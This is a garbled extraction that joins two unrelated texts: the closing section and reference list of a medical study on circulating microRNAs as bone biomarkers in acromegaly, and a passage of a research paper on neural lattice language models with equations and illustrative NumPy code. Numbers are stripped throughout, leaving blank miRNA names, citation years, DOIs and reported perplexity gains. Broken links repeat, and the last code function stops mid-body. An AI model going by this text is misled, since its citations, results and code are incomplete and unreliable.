with controls and are associated with both biochemical and structural parameters of bone metabolism. in particular, our data, which need to be confirmed in larger studies, suggest that mir- a- p and mir- - p may be promising biomarkers to evaluate the presence of bone disease in gh/igf-i excess and assess the persistence of bone impairment even after biochemical control has been reached. supplementary data this is linked to the online version of the paper at https://doi.org/ . / ec- - . 
declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this work was supported by grants from the instituto de salud carlos iii (fis pi / and pi / ), feder funds. acknowledgement a special thanks to all the patients and controls who accepted to participate in this research. the authors are indebted to ana maria marín and eulalia urgell for their technical assistance. references giustina a, mazziotti g & canalis e. growth hormone, insulin-like growth factors, and the skeleton. endocrine reviews – . (https://doi.org/ . /er. - ) olarescu nc, berryman de, householder la, lubbers er, list eo, benencia f, kopchick jj & bollerslev j. gh action influences adipogenesis of mouse adipose tissue-derived mesenchymal stem cells. journal of endocrinology – . (https://doi. org/ . /joe- - ) ueland t, olarescu nc, jorgensen ap, otterdal k, aukrust p, godang k, levka t & bollerslev j. increased serum and bone matrix levels of the secreted wnt antagonist dkk- in patients with growth hormone deficiency in response to growth hormone treatment. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) colao a, ferone d, marzullo p & lombardi g. systemic complications of acromegaly: epidemiology, pathogenesis and management. endocrine reviews – . (https://doi. org/ . /er. - ) dekkers om, biermasz nr, pereira am, romijn ja & vandenbroucke jp. mortality in acromegaly: a metaanalysis. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) madeira m, neto lv, de paula paranhos neto f, barbosa lima ic, carvalho de mendonça lm, gadelha mr & fleiuss de farias ml. acromegaly has a negative influence on trabecular bone, but not on cortical bone, as assessed by high-resolution peripheral quantitative computed tomography. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) maffezzoni f, maddalo m, frara s, mezzone m, zorza i, baruffaldi f, doglietto f, mazziotti g & maroldi r. high-resolution beam tomography analysis of bone microarchitecture in patients with acromegaly and radiological vertebral fractures. endocrine – . (https://doi.org/ . /s - - - ) valassi e, crespo i, malouf j, llauger j, aulinas a, marin am, biagetti b & webb sm. reduction of trabecular and cortical volumetric bone this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /ec- - https://doi.org/ . /ec- - https://doi.org/ . /er. - https://doi.org/ . /joe- - https://doi.org/ . /joe- - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /er. - https://doi.org/ . /er. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - - - https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly pb– : mineral density at the proximal femur in patients with acromegaly. european journal of endocrinology – . (https://doi. org/ . /eje- - ) malgo f, hamdy nat, rebelink tj, kroon hm, claessen kmja, pereira am, biermasz nr & appelman-dijkstra nm. 
bone material strength index as measured by impact micriindentation is altered in patients with acromegaly. european journal of endocrinology – . (https://doi.org/ . /eje- - ) kocijan r, muschitz c, geiger e, skalicky s, baierl a, dormann r, plachel f, feichtinger x, heimel p, fahrleitner-pammer a, et al. circulating microrna signatures in patients with idiopathic and postmenopausal osteoporosis and fagility fractures. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) hassan mq, tye ce, stein gs & lian jb. non-coding rnas : epigenetic regulators of bone development and homeostasis. bone – . (https://doi.org/ . /j.bone. . . ) turchinovich a, weiz l & burwinker b. extracellular mirnas: the mistery of their origin and function. trends in biochemical sciences – . (https://doi.org/ . /j.tibs. . . ) gordon jar, montecino ma, aqueilan ri, stein jl, stein gs & lian jb. epigenetic pathways regulating bone homeostasis: potential targeting for intervention of skeletal disorders. current osteoporosis reports – . (https://doi.org/ . /s - - - ) cao z, moore bt, wang y, peng xh, lappe jm, recker rr & xiao p. mir- a as a potential cellular microrna biomarker for postmenopausal osteoporosis. plos one e . (https://doi. org/ . /journal.pone. ) li h, wang z, fu q & zhang j. plasma mirna levels correlate with sensitivity to bone mineral density in postmenopausal osteoporosis patients. biomarkers – . (https://doi.org/ . / x. . ) bedene a, mencej bedrač s, ješe l, marc j, vrtačnik p, preželj j, kocjan t, kranjc t, ostanek b mir- a the epigenetic regulator of bone homeostasis is increased in plasma of osteoporotic postmenopausal women. wiener klinische wochenschrift (supplement ) – . (https://doi.org/ . /s - - - ) seeliger c, karpinski k, haug, vester h, schmitt a, bauer js & van griensven m five freely circulating mirnas and bone tissue mirnas are associated with osteoporotic fractures. journal of bone and mineral research – . (https://doi.org/ . /jbmr. ) weilner s, skalicky s, salzer b, keider v, wagner f, hildner f, gabriel c, dovjak p, pietschmann p, grillari-voglauer r, et al. differentially circulating mirnas after recent osteoporotic fracture can influence osteogenic differentiation. bone – . (https://doi. org/ . /j.bone. . . ) panach l, mifsut d, tarín jj, cano a & garcia-pérez ma. serum circulating micrornas as biomarkers of osteoporotic fracture. calcified tissue international – . (https://doi. org/ . /s - - -z) heilmeier u, hackl m, skalicky s, weilner s, schroeder f, vierlinger k, patsch jm, baum t, oberbauer e, lobach i, et al. serum mirna signatures are indicative of skeletal fractures in postmenopausal women with and without type diabetes and influence osteogenic and adipogenic differentiation of adipose tissue-derived mesenchymal stem cells in vitro. journal of bone and mineral research – . (https://doi.org/ . /jbmr. ) yavropoulou mp, anastasilakis a, makras p, tsalikakis d, grammatiki m & yovos jg. expression of micrornas that regulate bone turnover in the serum of postmenopausal women with low bone mass and vertebral fractures. european journal of endocrinology – . (https://doi.org/ . /eje- - ) belaya z, grebennikova t, melnichenko ga, nikitin a, solodovnikov a, brovkina a, grigoriev a, rozhinskaya l, lutsenko a & dedov ll. effects of active acromegaly on bone mrna and microrna expression patterns. european journal of endocrinology – . (https://doi.org/ . /eje- - ) aulinas a, crespo i, vilades d, leta r, urgell e, biagetti b, webb sm & valassi e. 
cystatin-c and epicardial adipose tissue as noninvasive predictors of cardiovascular risk in acromegaly. clinical endocrinology – . (https://doi.org/ . /cen. ) giustina a, chanson p, bronstein md, klibanski a, lamberts s, casanueva ff, trainer p, ghigo e, ho k & melmed s. a consensus on criteria for cure of acromegaly. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) molitch me, clemmons dr, malozowski s, merriam gr & vance ml. evaluation and treatment of adult growth hormone deficiency: an endocrine society clinical practice guidelines. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) allison sj, poole kes, treece gm, gee ah, tonkin c, rennie wj, folland jp, summers gd & brooke-wavell k. the influence of high impact exercise on cortical and trabecular bone mineral content and d distribution across the proximal femur in older men: a randomised controlled unilateral intervention. journal of bone and mineral research – . (https://doi.org/ . /jbmr. ) zuo b, zhu j, li j, wang c, zhao x, cai g, li z, peng j, wang p & shen c, et al. microrna- a functions as a mechanosensitive microrna to inhibit bone formation through targeting runx . journal of bone and mineral research – . (https://doi. org/ . /jbmr. ) mao zg, sheng he d, zhou j, yao b, xiao w, chen ch, zhu yh & wang jj. differential expression of micrornas in gh secreting pituitary adenomas. diagnostic pathology . (https://doi. org/ . / - - - ) blondal t, jensby nielsen s, baker a, andreasen d, mouritzen p, wrang teilum m & dahlsveen ik. assessing sample and mirna profile quality in serum and plasma or other biofluids. methods s –s . (https://doi.org/ . /j. ymeth. . . ) mazziotti g, frara s & giustina a. pituitary diseases and bone. endocrine reviews – . (https://doi.org/ . /er. - ) dalle carbonare l, micheletti v, cosaro e, valenti mt, mottes m, francia g & daví mv. bone histomorphometry in acromegaly patients with fragility vertebral fractures. pituitary – . (https://doi.org/ . /s - - - ) mazziotti g, biagioli e, maffezzoni f, spinello m, serra v, maroldi r, floriani i & giustina a. bone turnover, bone mineral density, and fracture risk in acromegaly: a meta-analysis. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) lanzi r, losa m, villa i, gatti e, sirtori m, dal fiume c & rubinacci a. gh replacement therapy increases plasma osteoprotegerin levels in gh-deficient adults. european journal of endocrinology – . (https://doi.org/ . /eje. . ) constantin t, tangpricha v, shah r, oyesiku nm, ioachimescu oc, ritchie j & ioachimescu ag. calcium and bone turnover markers in acromegaly: a prospective, controlled study. journal of clinical endocrinology and metabolism – (https://doi. org/ . /jc. - ) de-ugarte l, serra-vinardell j, nonell l, belcells s, arnal m, nogues m, mellibovski l, grinberg d, diez-perez a & garcía-giralt n. expression profiling of micrornas in human bone tissue from postmenopausal women. human cell – . (https://doi. org/ . /s - - -y) valenti mt, mottes, m, cheri s, deiana m, micheletti v, corsaro e & daví mv, francia g & dalle carbonare l. runx overexpression this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /eje- - https://doi.org/ . /eje- - https://doi.org/ . /eje- - https://doi.org/ . /jc. 
- https://doi.org/ . /jc. - https://doi.org/ . /j.bone. . . https://doi.org/ . /j.tibs. . . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . / x. . https://doi.org/ . / x. . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /jbmr. https://doi.org/ . /j.bone. . . https://doi.org/ . /j.bone. . . https://doi.org/ . /s - - -z https://doi.org/ . /s - - -z https://doi.org/ . /jbmr. https://doi.org/ . /eje- - https://doi.org/ . /eje- - https://doi.org/ . /cen. https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . /jbmr. https://doi.org/ . / - - - https://doi.org/ . / - - - https://doi.org/ . /j.ymeth. . . https://doi.org/ . /j.ymeth. . . https://doi.org/ . /er. - https://doi.org/ . /er. - https://doi.org/ . /s - - - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /eje. . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s - - -y https://doi.org/ . /s - - -y https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com e valassi et al. mirnas and bone in acromegaly : compromises bonr quality in acromegaly. endocrine-related cancer – . (https://doi.org/ . /erc- - ) komori t, yagi h, nomura s, yamaguchi a, sasaki k, deguchi k, shimizu y, bronson rt, gao yh, inada m, et al. targeted disruption of cbfa results in a complete lack of bone formation owing to maturational arrest of osteoblasts. cell – . (https://doi. org/ . /s - ( ) - ) cohen mm jr. perspectives on runx genes: an update. american journal of medical genetics part a – . (https://doi. org/ . /ajmg.a. ) godang k, olarescu nc, bollerslev j & heck a. treatment of acromegaly increases bmd but reduced trabecular bone score: a longitudinal study. european journal of endocrinology – . (https://doi.org/ . /eje- - ) shah r, licata a, oyesiku nm & ioachimescu ag. acromegaly as a cause of , -dihydroxyvitamin d-dependent hypercalcemia: case reports and review of the literature. pituitary s –s . (https://doi.org/ . /s - - - ) valassi e, crespo i, malouf j, vilades d, leta r, llauger j, urgell e, aulinas a, marin am, biagetti b, et al. epicardial fat is a negative predictor of spine volumetric bone mineral density and trabecular bone score in acromegaly. endocrine – . (https://doi. org/ . /s - - - ) giustina a, chanson p, kleinberg d, bronstein md, clemmons dr, klibanski a, van der lely aj, strasburger cj, lamberts sw, ho kky, et al. expert consensus document: a consensus on the medical treatment of acromegaly. nature reviews endocrinology – . (https://doi.org/ . / nrendo. . ) biermasz nr, hamdy nat, pereira am, romijn ja & roelfesma f. long-term maintenance of the anabolic effects of gh on the skeleton in successfully treated patients with acromegaly. european journal of endocrinology – . (https://doi.org/ . / eje. . ) melmed s, colao a, barkan a, molitch m, grossman ab, kleinberg d, clemmons d, chanson p, laws e, schlechte j, et al. guideline for acromegaly management. an update. journal of clinical endocrinology and metabolism – . (https://doi.org/ . / jc. - ) zhang jx, song w, chen zh, wei jh, liao yj, lei j, hu m, chen gz, liao b, lu j, et al. prognostic and predictive value of a microrna signature in stage ii colon cancer: a microrna expression analysis. lancet oncology – . 
Fasihi A, Soltani BM, Atashi A & Nasiri S. Introduction of hsa-miR- a and hsa-miR- and hsa-miR- as new regulators of the Wnt signaling pathway and their relation to colorectal carcinoma. Journal of Cell Biochemistry.
Shen Y, Ye YF, Ruan LW, Bao L, Wu MW & Zhou Y. Inhibition of miR- - p expression suppresses tumor development and metastasis in human breast cancer. Genetics and Molecular Research.
Bye A, Røsjø H, Nauman J, Silva GJ, Follestad T, Omland T & Wisløff U. Circulating microRNAs predict future fatal myocardial infarction in healthy individuals – the HUNT study. Journal of Molecular and Cellular Cardiology.
Jakob P, Kacprowski T, Briand-Schumacher S, Heg D, Klingenberg R, Stähli BE, Jaguszewski M, Rodondi N, Nanchen D, Räber L, et al. Profiling and validation of circulating microRNAs for cardiovascular events in patients presenting with ST-segment elevation myocardial infarction. European Heart Journal.
Chen P, Pan X, Zhao L, Jin L, Lin C, Quan J, He T, Zhou L, Wu X, Wang Y, et al. MicroRNA- - p exerts a tumor suppressive role in renal cell carcinoma. Experimental and Therapeutic Medicine.

Received in final form December; accepted December; accepted preprint published online December.

Neural Lattice Language Models

Jacob Buckman, Language Technologies Institute, Carnegie Mellon University, jacobbuckman@gmail.com
Graham Neubig, Language Technologies Institute, Carnegie Mellon University, gneubig@cs.cmu.edu

Abstract

In this work, we propose a new language modeling paradigm that has the ability to perform both prediction and moderation of information flow at multiple granularities: neural lattice language models.
These models construct a lattice of possible paths through a sentence and marginalize across this lattice to calculate sequence probabilities or optimize parameters. This approach allows us to seamlessly incorporate linguistic intuitions – including polysemy and the existence of multi-word lexical items – into our language model. Experiments on multiple language modeling tasks show that English neural lattice language models that utilize polysemous embeddings are able to improve perplexity by . % relative to a word-level baseline, and that a Chinese model that handles multi-character tokens is able to improve perplexity by . % relative to a character-level baseline.

Introduction

Neural network models have recently contributed towards a great amount of progress in natural language processing. These models typically share a common backbone: recurrent neural networks (RNN), which have proven themselves to be capable of tackling a variety of core natural language processing tasks (Hochreiter and Schmidhuber, ; Elman, ). One such task is language modeling, in which we estimate a probability distribution over sequences of tokens that corresponds to observed sentences (§ ). Neural language models, particularly models conditioned on a particular input, have many applications including machine translation (Bahdanau et al., ), abstractive summarization (Chopra et al., ), and speech processing (Graves et al., ).

Figure : Lattice decomposition of a sentence and its corresponding lattice language model probability calculation.

Similarly, state-of-the-art language models are almost universally based on RNNs, particularly long short-term memory (LSTM) networks (Jozefowicz et al., ; Inan et al., ; Merity et al., ). While powerful, LSTM language models usually do not explicitly model many commonly accepted linguistic phenomena. As a result, standard models lack linguistically informed inductive biases, potentially limiting their accuracy, particularly in low-data scenarios (Adams et al., ; Koehn and Knowles, ). In this work, we present a novel modification to the standard LSTM language modeling framework that allows us to incorporate some varieties of these linguistic intuitions seamlessly: neural lattice language models (§ ). Neural lattice language models define a lattice over possible paths through a sentence, and maximize the marginal probability over all paths that lead to generating the reference sentence, as shown in Fig. . Depending on how we define these paths, we can incorporate different assumptions about how language should be modeled.

In the particular instantiations of neural lattice language models covered by this paper, we focus on two properties of language that could potentially be of use in language modeling: the existence of multi-word lexical units (Zgusta, ) (§ ) and polysemy (Ravin and Leacock, ) (§ ). Neural lattice language models allow the model to incorporate these aspects in an end-to-end fashion by simply adjusting the structure of the underlying lattices.
We run experiments to explore whether these modifications improve the performance of the model (§ ). Additionally, we provide qualitative visualizations of the model to attempt to understand what types of multi-token phrases and polysemous embeddings have been learned.

Background

Language models

Consider a sequence X for which we want to calculate its probability. Assume we have a vocabulary from which we can select a unique list of |X| tokens x_1, x_2, \ldots, x_{|X|} such that X = [x_1; x_2; \ldots; x_{|X|}], i.e. the concatenation of the tokens (with an appropriate delimiter). These tokens can be either on the character level (Hwang and Sung, ; Ling et al., ) or word level (Inan et al., ; Merity et al., ). Using the chain rule, language models generally factorize p(X) in the following way:

p(X) = p(x_1, x_2, \ldots, x_{|X|}) = \prod_{t=1}^{|X|} p(x_t \mid x_1, x_2, \ldots, x_{t-1}).

Note that this factorization is exact only in the case where the segmentation is unique. In character-level models, it is easy to see that this property is maintained, because each token is unique and non-overlapping. In word-level models, this also holds, because tokens are delimited by spaces, and no word contains a space.

Recurrent neural networks

Recurrent neural networks have emerged as the state-of-the-art approach to approximating p(X). In particular, the LSTM cell (Hochreiter and Schmidhuber, ) is a specific RNN architecture which has been shown to be effective on many tasks, including language modeling (Press and Wolf, ; Jozefowicz et al., ; Merity et al., ; Inan et al., ). LSTM language models (in this work, we utilize an LSTM with linked input and forget gates, as proposed by Greff et al. ( )) recursively calculate the hidden and cell states (h_t and c_t respectively) given the input embedding e_{t-1} corresponding to token x_{t-1}:

h_t, c_t = \mathrm{LSTM}(h_{t-1}, c_{t-1}, e_{t-1}, \theta),

then calculate the probability of the next token given the hidden state, generally by performing an affine transform parameterized by W and b, followed by a softmax:

p(x_t \mid h_t) := \mathrm{softmax}(W h_t + b).

Neural Lattice Language Models

Language models with ambiguous segmentations

To reiterate, the standard formulation of language modeling in the previous section requires splitting sentence X into a unique set of tokens x_1, \ldots, x_{|X|}. Our proposed method generalizes the previous formulation to remove the requirement of uniqueness of segmentation, similar to that used in non-neural n-gram language models such as Dupont and Rosenfeld ( ) and Goldwater et al. ( ).

First, we define some terminology. We use the term "token", designated by x_i, to describe any indivisible item in our vocabulary that has no other vocabulary item as its constituent part. We use the term "chunk", designated by k_i or x_i^j, to describe a sequence of one or more tokens that represents a portion of the full string X, containing the unit tokens x_i through x_j: x_i^j = [x_i; x_{i+1}; \ldots; x_j]. We also refer to the "token vocabulary", which is the subset of the vocabulary containing only tokens, and to the "chunk vocabulary", which similarly contains all chunks.

Note that we can factorize the probability of any sequence of chunks K using the chain rule, in precisely the same way as sequences of tokens:

p(K) = p(k_1, k_2, \ldots, k_{|K|}) = \prod_{t=1}^{|K|} p(k_t \mid k_1, k_2, \ldots, k_{t-1}).

We can factorize the overall probability of a token list X in terms of its chunks by using the chain rule, and marginalizing over all segmentations.
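To make the preceding formulation concrete, the following is a minimal, self-contained NumPy sketch of a recurrent language model step: a recurrent state update followed by a softmax over the vocabulary, with per-token probabilities multiplied along the sentence via the chain rule. A plain tanh recurrence stands in for the LSTM cell, and all sizes, weights and the toy vocabulary are illustrative placeholders rather than the paper's DyNet implementation.

```python
import numpy as np

rng = np.random.default_rng(0)
V, H, E = 5, 8, 8                      # toy vocabulary / hidden / embedding sizes
emb  = rng.normal(size=(V, E)) * 0.1   # token embeddings
W_hh = rng.normal(size=(H, H)) * 0.1   # recurrent weights
W_he = rng.normal(size=(H, E)) * 0.1   # input weights
W    = rng.normal(size=(V, H)) * 0.1   # output projection
b    = np.zeros(V)

def softmax(z):
    z = z - z.max()
    p = np.exp(z)
    return p / p.sum()

def sentence_log_prob(token_ids):
    """log p(X) = sum_t log p(x_t | x_1..x_{t-1}), using a tanh recurrence
    as a stand-in for the LSTM state update."""
    h = np.zeros(H)
    prev = np.zeros(E)                          # embedding of a <bos> placeholder
    logp = 0.0
    for t in token_ids:
        h = np.tanh(W_hh @ h + W_he @ prev)     # recurrent state update
        probs = softmax(W @ h + b)              # affine transform + softmax
        logp += np.log(probs[t])
        prev = emb[t]
    return logp

print(sentence_log_prob([0, 3, 1, 4]))
```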
For any particular token list X, we define a set of valid segmentations S(X), such that for every sequence S ∈ S(X), X = [x_{s_0}^{s_1 - 1}; x_{s_1}^{s_2 - 1}; \ldots; x_{s_{|S|-1}}^{s_{|S|} - 1}]. The factorization is:

p(X) = \sum_{S} p(X, S) = \sum_{S} p(X \mid S)\, p(S) = \sum_{S \in S(X)} p(S) = \sum_{S \in S(X)} \prod_{t=1}^{|S|} p\big(x_{s_{t-1}}^{s_t - 1} \mid x_{s_0}^{s_1 - 1}, x_{s_1}^{s_2 - 1}, \ldots, x_{s_{t-2}}^{s_{t-1} - 1}\big).

Note that, by definition, there exists a unique segmentation of X such that x_1, x_2, \ldots are all tokens, in which case |S| = |X|. When only that one unique segmentation is allowed per X, S(X) contains only that one element, so the summation drops out, and therefore for standard character-level and word-level models, this expression reduces to the chain-rule factorization above, as desired. However, for models that license multiple segmentations per X, computing this marginalization directly is generally intractable. For example, consider segmenting a sentence using a vocabulary containing all words and all multi-word expressions. The size of S(X) would grow exponentially with the number of words in X, meaning we would have to marginalize over trillions of unique segmentations for even modestly sized sentences.

Lattice language models

To avoid this, it is possible to re-organize the computations in a lattice, which allows us to dramatically reduce the number of computations required (Dupont and Rosenfeld, ; Neubig et al., ). All segmentations of X can be expressed as the edges of paths through a lattice over token-level prefixes of X: x_{<1}, x_{<2}, \ldots, X. The infimum is the empty prefix x_{<1}; the supremum is X; an edge from prefix x_{<i} to prefix x_{<j} exists if and only if there exists a chunk x_i^j in our chunk vocabulary such that [x_{<i}; x_i^j] = x_{<j}. Each path through the lattice from x_{<1} to X is a segmentation of X into the list of tokens on the traversed edges, as seen in Fig. . The probability of a specific prefix p(x_{<j}) is calculated by marginalizing over all segmentations leading up to it:

p(x_{<j}) = \sum_{S \in S(x_{<j})} \prod_{t=1}^{|S|} p\big(x_{s_{t-1}}^{s_t - 1} \mid x_{<s_{t-1}}\big),

where by definition s_{|S|} = j. The key insight here that allows us to calculate this efficiently is that this is a recursive formula, and that instead of marginalizing over all segmentations, we can marginalize over immediate predecessor edges in the lattice, A_j. Each item in A_j is a location i (= s_{t-1}), which indicates that the edge between prefix x_{<i} and prefix x_{<j}, corresponding to token x_i^j, exists in the lattice. We can thus calculate p(x_{<j}) as

p(x_{<j}) = \sum_{i \in A_j} p(x_{<i})\, p(x_i^j \mid x_{<i}).

Since X is the supremum prefix node, we can use this formula to calculate p(X) by setting j = |X|. In order to do this, we need to calculate the probability of each of its |X| predecessors. Each of those takes up to |X| calculations, meaning that the computation for p(X) can be done in O(|X|²) time. If we can guarantee that each node will have a maximum number of incoming edges D, so that |A_j| ≤ D for all j, then this bound can be reduced to O(D|X|) time. The proposed technique is completely agnostic to the shape of the lattice, and Fig. illustrates several potential varieties of lattices. Depending on how the lattice is constructed, this approach can be useful in a variety of different contexts, two of which we discuss in § .

Neural lattice language models

There is still one missing piece in our attempt to apply neural language models to lattices. Within our overall probability above, we must calculate the probability p(x_i^j \mid x_{<i}) of the next segment given the history.
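The prefix recursion above is a standard forward (sum-product) dynamic program. The sketch below is a simplified illustration rather than the released implementation: it computes the marginal log-probability of a token list over a dense lattice whose edges are all chunks of length at most L, and the scoring function `chunk_logprob` is a placeholder for the trained model's next-segment probability p(x_i^j | x_{<i}).

```python
import numpy as np

def lattice_log_prob(tokens, chunk_logprob, L=3):
    """Marginal log-probability of `tokens` under the recursion
        p(x_{<j}) = sum_{i in A_j} p(x_{<i}) * p(x_i^j | x_{<i}),
    computed left-to-right over prefix nodes of a dense lattice."""
    n = len(tokens)
    alpha = np.full(n + 1, -np.inf)     # alpha[j] = log p(prefix of length j)
    alpha[0] = 0.0                      # empty prefix
    for j in range(1, n + 1):
        scores = []
        for i in range(max(0, j - L), j):          # predecessors A_j
            chunk = tuple(tokens[i:j])
            scores.append(alpha[i] + chunk_logprob(tokens[:i], chunk))
        alpha[j] = np.logaddexp.reduce(scores)     # marginalize over predecessors
    return alpha[n]

# Toy usage with a uniform stand-in model: every candidate chunk receives the
# same probability mass, split over a fixed 10-chunk "vocabulary".
toy_model = lambda prefix, chunk: np.log(1.0 / 10.0)
print(lattice_log_prob("the dog barked .".split(), toy_model, L=3))
```

With at most L predecessors per node, the loop performs O(L|X|) score evaluations, matching the bound stated above.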
However, given that there are potentially an exponential number of paths through the lattice leading to x_i, this is not as straightforward as in the case where only one segmentation is possible. Previous work on lattice-based language models (Neubig et al., ; Dupont and Rosenfeld, ) utilized count-based n-gram models, which depend on only a limited historical context at each step, making it possible to compute the marginal probabilities in an exact and efficient manner through dynamic programming. (Thus, the standard token-level language model, where D = , takes O(|X|) computations.) On the other hand, recurrent neural models depend on the entire context, causing them to lack this ability. Our primary technical contribution is therefore to describe several techniques for incorporating lattices into a neural framework with infinite context, by providing ways to approximate the hidden state of the recurrent neural net.

Figure : Example of (a) a single-path lattice, (b) a sparse lattice, (c) a dense lattice with D = , and (d) a multi-lattice with D = , for the sentence "the dog barked ."

Direct approximation

One approach to approximating the hidden state is the TreeLSTM framework described by Tai et al. ( ). In the TreeLSTM formulation, new states are derived from multiple predecessors by simply summing the individual hidden and cell state vectors of each of them. For each predecessor location i ∈ A_j, we first calculate the local hidden state \tilde{h} and local cell state \tilde{c} by combining the embedding e_i^j with the hidden state of the LSTM at x_{<i} using the standard LSTM update function given above:

\tilde{h}_i, \tilde{c}_i = \mathrm{LSTM}(h_i, c_i, e_i^j, \theta) \quad \text{for } i \in A_j.

We then sum the local hidden and cell states:

h_j = \sum_{i \in A_j} \tilde{h}_i, \qquad c_j = \sum_{i \in A_j} \tilde{c}_i.

This framework has been used before for calculating neural sentence representations involving lattices by Su et al. ( ) and Sperber et al. ( ), but not for the language models that are the target of this paper. This formulation is powerful, but comes at the cost of sacrificing the probabilistic interpretation of which paths are likely. Therefore, even if almost all of the probability mass comes through the "true" segmentation, the hidden state may still be heavily influenced by all of the "bad" segmentations as well.

Monte-Carlo approximation

Another approximation that has been proposed is to sample one predecessor state from all possible predecessors, as seen in Chan et al. ( ). We can calculate the total probability that we reach some prefix x_{<j}, and we know how much of this probability comes from each of its predecessors in the lattice, so we can construct a probability distribution over predecessors in the lattice:

m(x_{<i} \mid \theta) = \frac{p(x_{<i} \mid \theta)\, p(x_i^j \mid x_{<i}; \theta)}{p(x_{<j} \mid \theta)}.

Therefore, one way to update the LSTM is to sample one predecessor x_{<i} from the distribution m and simply set h_j = \tilde{h}_i and c_j = \tilde{c}_i. However, sampling is unstable and difficult to train: we found that the model tended to over-sample short tokens early on during training, and thus segmented every sentence into unigrams. This is similar to the outcome reported by Chan et al. ( ), who accounted for it by incorporating an ε to encourage exploration.
Marginal approximation

In another approach, which allows us to incorporate information from all predecessors while maintaining a probabilistic interpretation, we can utilize the probability distribution m to instead calculate the expected value of the hidden state:

h_j = \mathbb{E}_{x_{<i} \sim m}[\tilde{h}_i] = \sum_{i \in A_j} m(x_{<i} \mid \theta)\, \tilde{h}_i, \qquad c_j = \mathbb{E}_{x_{<i} \sim m}[\tilde{c}_i] = \sum_{i \in A_j} m(x_{<i} \mid \theta)\, \tilde{c}_i.

Gumbel-softmax interpolation

The Gumbel-softmax trick, or concrete distribution, described by Jang et al. ( ) and Maddison et al. ( ), is a technique for incorporating discrete choices into differentiable neural computations. In this case, we can use it to select a predecessor. The Gumbel-softmax trick works by taking advantage of the fact that adding Gumbel noise to the pre-softmax predecessor scores and then taking the argmax is equivalent to sampling from the probability distribution. By replacing the argmax with a softmax function scaled by a temperature τ, we can get this pseudo-sampled distribution through a fully differentiable computation:

n(x_{<i} \mid \theta) = \frac{\exp\big((\log(m(x_{<i} \mid \theta)) + g_i)/\tau\big)}{\sum_{k \in A_j} \exp\big((\log(m(x_{<k} \mid \theta)) + g_k)/\tau\big)}.

This new distribution can then be used to calculate the hidden state by taking a weighted average of the states of possible predecessors:

h_j = \sum_{i \in A_j} n(x_{<i} \mid \theta)\, \tilde{h}_i, \qquad c_j = \sum_{i \in A_j} n(x_{<i} \mid \theta)\, \tilde{c}_i.

When τ is large, the values of n(x_{<i} | θ) are flattened out; therefore, all the predecessor hidden states are summed with approximately equal weight, equivalent to the direct approximation. On the other hand, when τ is small, the output distribution becomes extremely peaky, and one predecessor receives almost all of the weight. Each predecessor x_{<i} has a chance of being selected equal to m(x_{<i} | θ), which makes it identical to ancestral sampling. By slowly annealing the value of τ, we can smoothly interpolate between these two approaches, and end up with a probabilistic interpretation that avoids the instability of pure sampling-based approaches.

Instantiations of Neural Lattice LMs

In this section, we introduce two instantiations of neural lattice language models aiming to capture features of language: the existence of coherent multi-token chunks, and the existence of polysemy.

Incorporating multi-token phrases

Motivation

Natural language phrases often demonstrate significant non-compositionality: for example, in English, the phrase "rock and roll" is a genre of music, but this meaning is not obtained by viewing the words in isolation. In word-level language modeling, the network is given each of these words as input, one at a time; this means it must capture the idiomaticity in its hidden states, which is quite roundabout and potentially a waste of the limited parameters in a neural network model. A straightforward solution is to have an embedding for the entire multi-token phrase, and use this to input the entire phrase to the LSTM in a single timestep. However, it is also important that the model is able to decide whether the non-compositional representation is appropriate given the context: sometimes, "rock" is just a rock.

Additionally, by predicting multiple tokens in a single timestep, we are able to decrease the number of timesteps across which the gradient must travel, making it easier for information to be propagated across the sentence. This is even more useful in non-space-delimited languages such as Chinese, in which segmentation is non-trivial, but character-level modeling leads to many sentences being hundreds of tokens long.
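Before turning to the specific lattice structures, the sketch below illustrates in NumPy the three predecessor-combination strategies described in the previous section: direct summation, expectation under m, and the Gumbel-softmax relaxation. The candidate states and weights are toy values; in the real model they would come from the lattice LSTM, and this is an illustrative sketch rather than the paper's DyNet code.

```python
import numpy as np

rng = np.random.default_rng(0)

def combine_predecessors(h_tilde, log_m, mode="expectation", tau=1.0):
    """Combine per-predecessor candidate states h_tilde (|A_j| x H) into one
    state h_j:
      - "direct":      unweighted sum (TreeLSTM-style),
      - "expectation": weights m(x_{<i} | theta),
      - "gumbel":      Gumbel-softmax relaxation interpolating between the two.
    `log_m` holds the (already normalized) log predecessor probabilities."""
    if mode == "direct":
        return h_tilde.sum(axis=0)
    if mode == "expectation":
        w = np.exp(log_m)
    else:  # "gumbel"
        g = -np.log(-np.log(rng.uniform(size=log_m.shape)))   # Gumbel noise
        z = (log_m + g) / tau
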